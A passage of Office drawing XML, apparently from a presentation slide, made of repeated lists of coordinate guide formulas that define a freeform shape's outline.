              <a:gd name="connsiteX149" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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70350 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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70350 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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56043 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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56043 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 529511 w 1605470"/>
